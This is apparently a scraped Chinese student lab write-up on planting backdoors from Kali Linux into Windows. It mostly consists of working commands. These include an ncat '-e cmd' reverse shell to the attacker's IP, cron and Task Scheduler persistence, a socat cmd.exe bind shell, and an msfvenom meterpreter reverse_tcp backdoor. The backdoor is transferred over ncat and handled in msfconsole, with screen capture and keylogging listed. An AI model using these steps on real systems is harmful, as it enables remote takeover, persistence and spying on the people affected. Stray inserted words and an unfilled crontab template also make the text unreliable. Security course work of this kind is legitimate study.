①在linux获取windows 的shelllinux
在Windows中输入指令ncat.exe -e cmd kali的IP 端口号来将本身的cmd传给kali;
shell
②cron启动windows
使用crontab -e
修改配置文件,将最后一行改成m h dom mon dow user command
,:wq!
保存并退出。
网络
使用crontab -l
dom
这样kali内每小时的第20分钟自动运行指令,反弹至pc端的5238端口tcp
在windows系统中打开控制面板—管理工具-任务计划程序-建立任务-填写任务名称后新建触发器,以下图所示。
工具
在操做-程序或脚本中选择socat.exe
文件路径,在添加参数中写tcp-listen:5238 exec:cmd.exe,pty,stderr
,即将cmd.exe绑定到5238端口,同时将cmd.exe
的stderr
重定向到stdout上。以后能够看到本身的任务,右键运行!
3d
在linux中输入socat - tcp:IP:端口号
code
在kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=虚拟机IP LPORT=端口号 -f exe >20145224.exe
生成后门程序:
blog
ncat传输后门文件
windows系统使用ncat.exe -lv 端口号 > 保存文件名
监听准备接受文件;
kali系统使用ncat -nv 主机IP 端口号 < 文件名
来发送指定文件;
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 主机IP
set LPORT 端口号
show options(检查全部数据是否正确)
exploit
屏幕截图
键盘抓取
解决方法:首先是添加的触发器进程没有运行...其次是端口可能被占用,改了之后仍是不行,最后发现他的ip变了!!!!!!真的变了!以后成功了。